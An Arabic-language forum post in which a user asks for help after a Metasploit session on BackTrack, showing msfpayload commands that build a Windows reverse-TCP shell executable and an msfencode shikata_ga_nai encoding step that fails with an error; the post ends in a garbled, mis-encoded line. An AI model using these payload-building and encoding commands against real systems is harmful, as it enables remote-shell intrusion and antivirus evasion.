السلام عليكم شباب
الموضوع باين من عنوانه عندي مشكلة وما ادري الحل
اضع لكم الكود بين ايديكم
كود:
root@bt:/pentest/exploits/framework3# ./msfpayload windows/shell/reverse_tcp lhost=192.168.74.128 lpost=4444 x > /home/cmd.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell/reverse_tcp
Length: 290
Options: lhost=192.168.74.128,lpost=4444
root@bt:/pentest/exploits/framework3# ./msfencode -e x86/shikata_ga_nai -i /home/cmd.exe -t exe -o /home/shell.exe[*] x86/shikata_ga_nai succeeded with size 37917 (iteration=1)
[-] x86/shikata_ga_nai failed: The .text section is too small to be usable ./lib/msf/util/exe.rb:93:in `to_win32pe'./msfencode:212./msfencode:179:in `each'./msfencode:179
[-] No encoders succeeded.
root@bt:/pentest/exploits/framework3#
الرجاء المساعدة وبارك الله فيكم
Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC la;gm fjatdv hgfhdg,]